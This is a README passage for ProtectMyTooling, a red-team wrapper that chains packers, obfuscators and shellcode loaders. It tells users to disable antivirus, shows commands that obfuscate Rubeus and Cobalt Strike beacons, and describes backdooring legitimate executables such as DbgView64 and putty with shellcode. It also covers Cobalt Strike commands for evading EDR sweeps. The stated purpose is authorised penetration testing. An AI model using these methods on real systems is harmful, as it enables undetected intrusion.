  • Collects IOCs at every obfuscation step so that auditing & Blue Team requests can be satisfied
  • Offers functionality to inject custom Watermarks to resulting PE artifacts - in DOS Stub, Checksum, as a standalone PE Section, to file's Overlay
  • Comes up with a handy Cobalt Strike aggressor script bringing protected-upload and protected-execute-assembly commands
  • Straightforward command line usage

Installation

This tool was designed to work on Windows, as most packers natively target that platform.

Some features may work however on Linux just fine, nonetheless that support is not fully tested, please report bugs and issues.

  1. First, disable your AV and add contrib directory to exclusions. That directory contains obfuscators, protectors which will get flagged by AV and removed.
  2. Then clone this repository
PS C:\> git clone --recurse https://github.com/Binary-Offensive/ProtectMyTooling
  1. Actual installation is straightforward:

Windows

PS C:\ProtectMyTooling> .\install.ps1

Linux

bash# ./install.sh

Gimmicks

For ScareCrow packer to run on Windows 10, there needs to be WSL installed and bash.exe available (in %PATH%). Then, in WSL one needs to have golang installed in version at least 1.16:

cmd> bash
bash$ sudo apt update ; sudo apt upgrade -y ; sudo apt install golang=2:1.18~3 -y

Configuration

To plug-in supported obfuscators, change default options or point ProtectMyTooling to your obfuscator executable path, you will need to adjust config\ProtectMyTooling.yaml configuration file.

There is also config\sample-full-config.yaml file containing all the available options for all the supported packers, serving as reference point.

Friendly reminder

  • If your produced binary crashes or doesn't run as expected - try using different packers chain.
  • Packers don't guarantee stability of produced binaries, therefore ProtectMyTooling cannot as well.
  • While chaining, carefully match output->input payload formats according to what consecutive packer expects.

Usage

Before ProtectMyTooling's first use, it is essential to adjust program's YAML configuration file ProtectMyTooling.yaml. The order of parameters processal is following:

  • Firstly default parameters are used
  • Then they're overwritten by values coming from YAML
  • Finally, whatever is provided in command line will overwrite corresponding values

There, supported packer paths and options shall be set to enable.

Scenario 1: Simple ConfuserEx obfuscation

Usage is very simple, all it takes is to pass the name of obfuscator to choose, input and output file paths:

C:\> py ProtectMyTooling.py confuserex Rubeus.exe Rubeus-obf.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;\''';;;;\'\''',;;;'````;;;;;;;;\'\'''
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;\'''.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88" 888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

[.] Processing x86 file: "\Rubeus.exe"
[.] Generating output of ConfuserEx(<file>)...

[+] SUCCEEDED. Original file size: 417280 bytes, new file size ConfuserEx(<file>): 756224, ratio: 181.23%

Scenario 2: Simple ConfuserEx obfuscation followed by artifact test

One can also obfuscate the file and immediately attempt to launch it (also with supplied optional parameters) to ensure it runs fine with options -r --cmdline CMDLINE:

Scenario 3: Complex malware obfuscation with watermarking and IOCs collection

Below use case takes beacon.exe on input and feeds it consecutively into CallObf -> UPX -> Hyperion packers.

Then it will inject specified fooobar watermark to the final generated output artifact's DOS Stub as well as modify that artifact's checksum with value 0xAABBCCDD.

Finally, ProtectMyTooling will capture all IOCs (md5, sha1, sha256, imphash, and other metadata) and save them in auxiliary CSV file. That file can be used for IOC matching as engagement unfolds.

PS> py .\ProtectMyTooling.py callobf,upx,hyperion beacon.exe beacon-obf.exe -i -I operation_chimera -w dos-stub=fooobar -w checksum=0xaabbccdd

[...]

[.] Processing x64 file: "beacon.exe"
[>] Generating output of CallObf(<file>)...

[.] Before obfuscation file's PE IMPHASH: 17b461a082950fc6332228572138b80c
[.] After obfuscation file's PE IMPHASH: 378d9692fe91eb54206e98c224a25f43
[>] Generating output of UPX(CallObf(<file>))...

[>] Generating output of Hyperion(UPX(CallObf(<file>)))...

[+] Setting PE checksum to 2864434397 (0xaabbccdd)
[+] Successfully watermarked resulting artifact file.
[+] IOCs written to: beacon-obf-ioc.csv

[+] SUCCEEDED. Original file size: 288256 bytes, new file size Hyperion(UPX(CallObf(<file>))): 175616, ratio: 60.92%

Produced IOCs evidence CSV file will look as follows:

timestamp,filename,author,context,comment,md5,sha1,sha256,imphash
2022-06-10 03:15:52,beacon.exe,mgeeky@commandoVM,Input File,test,dcd6e13754ee753928744e27e98abd16,298de19d4a987d87ac83f5d2d78338121ddb3cb7,0a64768c46831d98c5667d26dc731408a5871accefd38806b2709c66cd9d21e4,17b461a082950fc6332228572138b80c
2022-06-10 03:15:52,y49981l3.bin,mgeeky@commandoVM,Obfuscation artifact: CallObf(<file>),test,50bbce4c3cc928e274ba15bff0795a8c,15bde0d7fbba1841f7433510fa9aa829f8441aeb,e216cd8205f13a5e3c5320ba7fb88a3dbb6f53ee8490aa8b4e1baf2c6684d27b,378d9692fe91eb54206e98c224a25f43
2022-06-10 03:15:53,nyu2rbyx.bin,mgeeky@commandoVM,Obfuscation artifact: UPX(CallObf(<file>)),test,4d3584f10084cded5c6da7a63d42f758,e4966576bdb67e389ab1562e24079ba9bd565d32,97ba4b17c9bd9c12c06c7ac2dc17428d509b64fc8ca9e88ee2de02c36532be10,9aebf3da4677af9275c461261e5abde3
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Obfuscation artifact: Hyperion(UPX(CallObf(<file>))),te st,8b706ff39dd4c8f2b031c8fa6e3c25f5,c64aad468b1ecadada3557cb3f6371e899d59790,087c6353279eb5cf04715ef096a18f83ef8184aa52bc1d5884e33980028bc365,a46ea633057f9600559d5c6b328bf83d
2022-06-10 03:15:53,beacon-obf.exe,mgeeky@commandoVM,Output obfuscated artifact,test,043318125c60d36e0b745fd38582c0b8,a7717d1c47cbcdf872101bd488e53b8482202f7f,b3cf4311d249d4a981eb17a33c9b89eff656fff239e0d7bb044074018ec00e20,a46ea633057f9600559d5c6b328bf83d

Supported Packers

ProtectMyTooling was designed to support not only Obfuscators/Packers but also all sort of builders/generators/shellcode loaders usable from the command line.

At the moment, program supports various Commercial and Open-Source packers/obfuscators. Those Open-Source ones are bundled within the project. Commercial ones will require user to purchase the product and configure its location in ProtectMyTooling.yaml file to point the script where to find them.

  1. Amber - Reflective PE Packer that takes EXE/DLL on input and produces EXE/PIC shellcode
  2. AsStrongAsFuck - A console obfuscator for .NET assemblies by Charterino
  3. CallObfuscator - Obfuscates specific windows apis with different apis.
  4. ConfuserEx - Popular .NET obfuscator, forked from Martin Karing
  5. Donut - Popular PE loader that takes EXE/DLL/.NET on input and produces a PIC shellcode
  6. Enigma - A powerful system designed for comprehensive protection of executable files
  7. Hyperion - runtime encrypter for 32-bit and 64-bit portable executables. It is a reference implementation and bases on the paper "Hyperion: Implementation of a PE-Crypter"
  8. IntelliLock - combines strong license security, highly adaptable licensing functionality/schema with reliable assembly protection
  9. InvObf - Obfuscates Powershell scripts with Invoke-Obfuscation (by Daniell Bohannon)
  10. LoGiC.NET - A more advanced free and open .NET obfuscator using dnlib by AnErrupTion
  11. Mangle - Takes input EXE/DLL file and produces output one with cloned certificate, removed Golang-specific IoCs and bloated size. By Matt Eidelberg (@Tyl0us).
  12. MPRESS - MPRESS compressor by Vitaly Evseenko. Takes input EXE/DLL/.NET/MAC-DARWIN (x86/x64) and compresses it.
  13. NetReactor - Unmatched .NET code protection system which completely stops anyone from decompiling your code
  14. NetShrink - an exe packer aka executable compressor, application password protector and virtual DLL binder for Windows & Linux .NET applications.
  15. Nimcrypt2 - Generates Nim loader running input .NET, PE or Raw Shellcode. Authored by (@icyguider)
  16. NimPackt-v1 - Takes Shellcode or .NET Executable on input, produces EXE or DLL loader. Brought to you by Cas van Cooten (@chvancooten)
  17. NimSyscallPacker - Takes PE/Shellcode/.NET executable and generates robust Nim+Syscalls EXE/DLL loader. Sponsorware authored by (@S3cur3Th1sSh1t)
  18. Packer64 - wrapper around John Adams' Packer64
  19. pe2shc - Converts PE into a shellcode. By yours truly @hasherezade
  20. peCloak - A Multi-Pass Encoder & Heuristic Sandbox Bypass AV Evasion Tool
  21. peresed - Uses "peresed" from avast/pe_tools to remove all existing PE Resources and signature (think of Mimikatz icon).
  22. ScareCrow - EDR-evasive x64 shellcode loader that produces DLL/CPL/XLL/JScript/HTA artifact loader
  23. sgn - Shikata ga nai (δ»•ζ–ΉγŒγͺい) encoder ported into go with several improvements. Takes shellcode, produces encoded shellcode
  24. SmartAssembly - obfuscator that helps protect your application against reverse-engineering or modification, by making it difficult for a third-party to access your source code
  25. sRDI - Convert DLLs to position independent shellcode. Authored by: Nick Landers, @monoxgas
  26. Themida - Advanced Windows software protection system
  27. UPX - a free, portable, extendable, high-performance executable packer for several executable formats.
  28. VMProtect - protects code by executing it on a virtual machine with non-standard architecture that makes it extremely difficult to analyze and crack the software

You can quickly list supported packers using -L option (table columns are chosen depending on Terminal width, the wider the more information revealed):

C:\> py ProtectMyTooling.py -L
[...]

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| # | Name | Type | Licensing | Input | Output | Author |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+
| 1 | amber | open-source | Shellcode Loader | PE | EXE, Shellcode | Ege B alci |
| 2 | asstrongasfuck | open-source | .NET Obfuscator | .NET | .NET | Charterino, klezVirus |
| 3 | backdoor | open-source | Shellcode Loader | Shellcode | PE | Mariusz Banach, @mariuszbit |
| 4 | callobf | open-source | PE EXE/DLL Protector | PE | PE | Mustafa Mahmoud, @d35ha |
| 5 | confuserex | open-source | .NET Obfuscator | .NET | .NET | mkaring |
| 6 | donut-packer | open-source | Shellcode Converter | PE, .NET, VBScript, JScript | Shellcode | TheWover |
| 7 | enigma | commercial | PE EXE/DLL Protector | PE | PE | The Enigma Protector Developers Team |
| 8 | hyperion | open-source | PE EXE/DLL Protector | PE | PE | nullsecurity team |
| 9 | intellilock | commercial | .NET Obfuscator | PE | PE | Eziriz |
| 10 | invobf | open-source | Powershell Obfuscator | Powershell | Powershell | Daniel Bohannon |
| 11 | logicnet | open-source | .NET Obfuscator | .NET | .NET | AnErrupTion, klezVirus |
| 12 | mangle | open-source | Executable Signing | PE | PE | Matt Eidelberg (@Tyl0us) |
| 13 | mpress | freeware | PE EXE/DLL Compressor | PE | PE | Vitaly Evseenko |
| 14 | netreactor | commercial | .NET Obfuscator | .NET | .NET | Eziriz |
| 15 | netshrink | open-source | .NET Obfuscator | .NET | .NET | Bartosz WΓ³jcik |
| 16 | nimcrypt2 | open-source | Shellcode Loader | PE, .NET, Shellcode | PE | @icyguider |
| 17 | nimpackt | open-source | Shellcode Loader | .NET, Shellcode | PE | Cas van Cooten (@chvancooten) |
| 18 | nimsyscall | sponsorware | Shellcode Loader | PE, .NET, Shellcode | PE | @S3cur3Th1sSh1t |
| 19 | packer64 | open-source | PE EXE/DLL Compressor | PE | PE | John Adams, @jadams |
| 20 | pe2shc | open-source | Shellcode Converter | PE | Shellcode | @hasherezade |
| 21 | pecloak | open-source | PE EXE/DLL Protector | PE | PE | Mike Czumak, @SecuritySift, buherator / v-p-b |
| 22 | peresed | open-source | PE EXE/DLL Protector | PE | PE | Martin VejnΓ‘r, Avast |
| 23 | scarecrow | open-source | Shellcode Loader | Shellcode | DLL, JScript, CPL, XLL | Matt Eidelberg (@Tyl0us) |
| 24 | sgn | open -source | Shellcode Encoder | Shellcode | Shellcode | Ege Balci |
| 25 | smartassembly | commercial | .NET Obfuscator | .NET | .NET | Red-Gate |
| 26 | srdi | open-source | Shellcode Encoder | DLL | Shellcode | Nick Landers, @monoxgas |
| 27 | themida | commercial | PE EXE/DLL Protector | PE | PE | Oreans |
| 28 | upx | open-source | PE EXE/DLL Compressor | PE | PE | Markus F.X.J. Oberhumer, LΓ‘szlΓ³ MolnΓ‘r, John F. Reiser |
| 29 | vmprotect | commercial | PE EXE/DLL Protector | PE | PE | vmpsoft |
+----+----------------+-------------+-----------------------+-----------------------------+------------------------+--------------------------------------------------------+

Above are the packers that are supported, but that doesn't mean that you have them configured and ready to use. To prepare their usage, you must first supply necessary binaries to the contrib directory and then configure your YAML file accordingly.

RedWatermarker - built-in Artifact watermarking

Artifact watermarking & IOC collection

This program is intended for professional Red Teams and is perfect to be used in a typical implant-development CI/CD pipeline. As a red teamer I'm always expected to deliver decent quality list of IOCs matching back to all of my implants as well as I find it essential to watermark all my implants for bookkeeping, attribution and traceability purposes.

To accommodate these requirements, ProtectMyTooling brings basic support for them.

Artifact Watermarking

ProtectMyTooling can apply watermarks after obfuscation rounds simply by using --watermark option.:

py ProtectMyTooling [...] -w dos-stub=fooooobar -w checksum=0xaabbccdd -w section=.coco,ALLYOURBASEAREBELONG

There is also a standalone approach, included in RedWatermarker.py script.

It takes executable artifact on input and accepts few parameters denoting where to inject a watermark and what value shall be inserted.

Example run will set PE Checksum to 0xAABBCCDD, inserts foooobar to PE file's DOS Stub (bytes containing This program cannot be run...), appends bazbazbaz to file's overlay and then create a new PE section named .coco append it to the end of file and fill that section with preset marker.

py RedWatermarker.py beacon-obf.exe -c 0xaabbccdd -t fooooobar -e bazbazbaz -s .coco,ALLYOURBASEAREBELONG

Full watermarker usage:

cmd> py RedWatermarker.py --help

;
ED.
,E#Wi
j. f#iE###G.
EW, .E#t E#fD#W;
E##j i#W, E#t t##L
E###D. L#D. E#t .E#K,
E#jG#W; :K#Wfff; E#t j##f
E#t t##f i##WLLLLtE#t :E#K:
E#t :K#E: .E#L E#t t##L
E#KDDDD###i f#E: E#t .D#W; ,; G: ,;
E#f,t#Wi,,, ,WW; E#tiW#G. f#i j. j. E#, : f#i j.
E#t ;#W: ; .D#;E#K##i .. GEEEEEEEL .E#t EW, .. : .. EW, E#t .GE .E#t EW,
DWi ,K.DL ttE##D. ;W, ,;;L#K;;. i#W, E##j ,W, .Et ;W, E##j E#t j#K; i#W, E##j
f. :K#L LWL E#t j##, t#E L#D. E###D. t##, ,W#t j##, E###D. E#GK#f L#D. E###D.
EW: ;W##L .E#f L: G###, t#E :K#Wfff; E#jG#W; L###, j###t G###, E#jG#W; E##D. :K#Wfff; E#jG#W;
E#t t#KE#L ,W#; :E####, t#E i##WLLLLt E#t t##f .E#j##, G#fE#t :E####, E#t t##f E##Wi i##WLLLLt E#t t##f
E#t f#D.L#L t#K: ;W#DG##, t#E .E#L E#t :K#E: ;WW; ##,:K#i E#t ;W#DG##, E#t :K#E:E#jL#D: .E#L E#t :K#E:
E#jG#f L#LL#G j###DW##, t#E f#E: E#KDDDD###i j#E. ##f#W, E#t j###DW##, E#KDDDD###E#t ,K#j f#E: E#KDDDD###i
E###; L###j G##i,,G##, t#E ,WW; E#f,t#Wi,,,.D#L ###K: E#t G##i,,G##, E#f,t#Wi,,E#t jD ,WW; E#f,t#Wi,,,
E#K: L#W; :K#K: L##, t#E .D#; E#t ;#W: :K#t ##D. E#t :K#K: L##, E#t ;#W: j#t .D#; E#t ;#W:
EG LE. ;##D. L##, fE tt DWi ,KK:... #G .. ;##D. L##, DWi ,KK: ,; tt DWi ,KK:
; ;@ ,,, .,, : j ,,, .,,


Watermark thy implants, track them in VirusTotal
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>

usage: RedWatermarker.py [options] <infile>

options:
-h, --help show this help message and exit

Required arguments:
infile Input implant file

Optional arguments:
-C, --check Do not actually inject watermark. Check input file if it contains specified watermarks.
-v, --verbose Verbose mode.
-d, --debug Debug mode.
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.

PE Executables Watermarking:
-t STR, --dos-stub STR
Insert watermark into PE DOS Stub (Th is program cannot be run...).
-c NUM, --checksum NUM
Preset PE checksum with this value (4 bytes). Must be number. Can start with 0x for hex value.
-e STR, --overlay STR
Append watermark to the file's Overlay (at the end of the file).
-s NAME,STR, --section NAME,STR
Append a new PE section named NAME and insert watermark there. Section name must be shorter than 8 characters. Section will be marked Read-Only, non-executable.

Currently only PE files watermarking is supported, but in the future Office documents and other formats are to be added as well.

IOCs Collection

IOCs may be collected by simply using -i option in ProtectMyTooling run.

They're being collected at the following phases:

  • on the input file
  • after each obfuscation round on an intermediary file
  • on the final output file

They will contain following fields saved in form of a CSV file:

  • timestamp
  • filename
  • author - formed as username@hostname
  • context - whether a record points to an input, output or intermediary file
  • comment - value adjusted by the user through -I value option
  • md5
  • sha1
  • sha256
  • imphash - PE Imports Hash, if available
  • (TODO) typeref_hash - .NET TypeRef Hash, if available

Resulting will be a CSV file named outfile-ioc.csv stored side by side to generated output artifact. That file is written in APPEND mode, meaning it will receive all subsequent IOCs.

RedBackdoorer - built-in PE Backdooring

ProtectMyTooling utilizes my own RedBackdoorer.py script which provides few methods for backdooring PE executables. Support comes as a dedicated packer named backdoor. Example usage:

Takes Cobalt Strike shellcode on input and encodes with SGN (Shikata Ga-Nai) then backdoors SysInternals DbgView64.exe then produces Amber EXE reflective loader

PS> py ProtectMyTooling.py sgn,backdoor,amber beacon64.bin dbgview64-infected.exe -B dbgview64.exe

::::::::::.:::::::.. ... :::::::::::.,:::::: .,-::::::::::::::::
`;;;```.;;;;;;``;;;; .;;;;;;;;;;;;;;;;;;;,;;;'````;;;;;;;;
`]]nnn]]' [[[,/[[[' ,[[ \[[, [[ [[cccc [[[ [[
$$$"" $$$$$$c $$$, $$$ $$ $$"""" $$$ $$
888o 888b "88bo"888,_ _,88P 88, 888oo,_`88bo,__,o, 88,
. YMMMb :.-:.MM ::-. "YMMMMMP" MMM """"YUMMM"YUMMMMMP" MMM
;;,. ;;;';;. ;;;;'
[[[[, ,[[[[, '[[,[[['
$$$$$$$$"$$$ c$$"
888 Y88" 888o,8P"`
::::::::::::mM... ... ::: :::::. :::. .,-:::::/
;;;;;;;;.;;;;;;;. .;;;;;;;. ;;; ;;`;;;;, `;;,;;-'````'
[[ ,[[ \[[,[[ \[[,[[[ [[[ [[[[[. '[[[[ [[[[[[/
$$ $$$, $$$$$, $$$$$' $$$ $$$ "Y$c$"$$c. "$$
88, "888,_ _,88"888,_ _,88o88oo,._888 888 Y88`Y8bo,,,o88o
MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

Full RedBackdoorer usage:

cmd> py RedBackdoorer.py --help

β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„
β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–Œ
β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–‘β–ˆβ–ˆ β–ˆβ–Œ
β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–‘β–“β–ˆβ–„ β–Œ
β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“
β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘β–’β–’β–“ β–’
β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘β–‘ β–’ β–’
β–‘β–‘ β–‘ β–‘ β–‘ &# 9617; β–‘
β–„β–„β–„β–„ β–„β–„β–„β–‘ β–‘ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–ˆβ–ˆ β–„β–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ
β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–‘β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–ˆβ–ˆβ–„β–ˆβ–’β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–’
β–’β–ˆβ–ˆβ–’ β–„β–ˆβ–’β–ˆβ–ˆ β–€β–ˆβ–„ β–’β–“β–ˆ &#9 604;β–“β–ˆβ–ˆβ–ˆβ–„β–‘β–‘β–ˆβ–ˆ β–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’
β–’β–ˆβ–ˆβ–‘β–ˆβ–€ β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆβ–’β–“β–“β–„ β–„β–ˆβ–ˆβ–“β–ˆβ–ˆ β–ˆβ–„β–‘β–“β–ˆβ–„ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„
β–‘β–“β–ˆ β–€β–ˆβ–“β–“β–ˆ β–“β–ˆβ–ˆβ–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–’β–ˆβ–ˆβ–’ β–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’ β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–’
β–‘β–’β–“β–ˆβ–ˆβ–ˆβ–€β–’β–’β–’ β–“β–’β–ˆβ–‘ β–‘β–’ β–’ β–’ β–’β–’ β–“β–’β–’β–’β–“ β–’β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘ β–’β–“ β–‘β–’β–“β–‘
β–’β–‘β–’ β–‘ β–’ β–’β–’ β–‘ β–‘ β–’ β–‘ β–‘β–’ β–’β–‘β–‘ β–’ β–’ β–‘ β–’ β–’β–‘ β–‘ β–’ β–’β–‘ β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘ β–‘β–’ β–‘ β–’β–‘
β–‘ β–‘ β–‘ β–’ &#9 617; β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–’ β–‘β–‘ β–‘ β–‘ β–‘β–‘ β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘
β–‘ β–‘ β–‘


Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>

usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>

options:
-h, --help show this help message and exit

Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor

Optional arguments:
-o PATH, --outfil e PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.

Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.

Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since its going to be invalidated anyway.

------------------

PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:

<mode>

save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
Example:

py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe

Cobalt Strike Integration

There is also a script that integrates ProtectMyTooling.py used as a wrapper around configured PE/.NET Packers/Protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within CobaltStrike.

The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly and forget about protecting or obfuscating them manually before each usage. The added benefit of an automated approach to transform executables is the ability to have the same executable protected each time it's used, resulting in unique samples launched on target machines. That should nicely deceive EDR/AV enterprise-wide IOC sweeps while looking for the same artefact on different machines.

Additionally, the protected-execute-assembly command has the ability to look for assemblies of which only name were given in a preconfigured assemblies directory (set in dotnet_assemblies_directory setting).

To use it:

  1. Load CobaltStrike/ProtectMyTooling.cna in your Cobalt Strike.
  2. Go to the menu and setup all the options

  1. Then in your Beacon's console you'll have following commands available:
  • protected-execute-assembly - Executes a local, previously protected and compressed .NET program in-memory on target.
  • protected-upload - Takes an input file, protects it if its PE executable and then uploads that file to specified remote location.

Basically these commands will open input files, pass the firstly to the CobaltStrike/cobaltProtectMyTooling.py script, which in turn calls out to ProtectMyTooling.py. As soon as the binary gets obfuscated, it will be passed to your beacon for execution/uploading.

Cobalt Strike related Options

Here's a list of options required by the Cobalt Strike integrator:

  • python3_interpreter_path - Specify a path to Python3 interpreter executable
  • protect_my_tooling_dir - Specify a path to ProtectMyTooling main directory
  • protect_my_tooling_config - Specify a path to ProtectMyTooling configuration file with various packers options
  • dotnet_assemblies_directory - Specify local path .NET assemblies should be looked for if not found by execute-assembly
  • cache_protected_executables - Enable to cache already protected executables and reuse them when needed
  • protected_executables_cache_dir - Specify a path to a directory that should store cached protected executables
  • default_exe_x86_packers_chain - Native x86 EXE executables protectors/packers chain
  • default_exe_x64_packers_chain - Native x64 EXE executables protectors/packers chain
  • default_dll_x86_packers_chain - Native x86 DLL executables protectors/packers chain
  • default_dll_x64_packers_chain - Native x64 DLL executables protectors/packers chain
  • default_dotnet_packers_chain - .NET executables protectors/packers chain

Known Issues

  • ScareCrow is very tricky to run from Windows. What worked for me is following:
    1. Run on Windows 10 and have WSL installed (bash.exe command available in Windows)
    2. Have golang installed in WSL at version 1.16+ (tested on 1.18)
    3. Make sure to have PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True set

Credits due & used technology

  • All packer, obfuscator, converter, loader credits goes to their authors. This tool is merely a wrapper around their technology!

    • Hopefully none of them mind me adding such wrappers. Should there be concerns - please reach out to me.
  • ProtectMyTooling also uses denim.exe by moloch-- by some Nim-based packers.


TODO

  • Write custom PE injector and offer it as a "protector"
  • Add watermarking to other file formats such as Office documents, WSH scripts (VBS, JS, HTA) and containers
  • Add support for a few other Packers/Loaders/Generators in upcoming future:

Disclaimer

Use of this tool as well as any other projects I'm author of for illegal purposes, unsolicited hacking, cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel in improving their customer networks cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.

The tool exposes handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.


β˜•Show Supportβ˜•

This and other projects are outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, Consider buying me a coffee (or better a beer) just to say thank you!

ο’ͺ

Author

   Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)


Mangle - Tool That Manipulates Aspects Of Compiled Executables (.Exe Or DLL) To Avoid Detection From EDRs


Authored By Tyl0us

Featured at Source Zero Con 2022

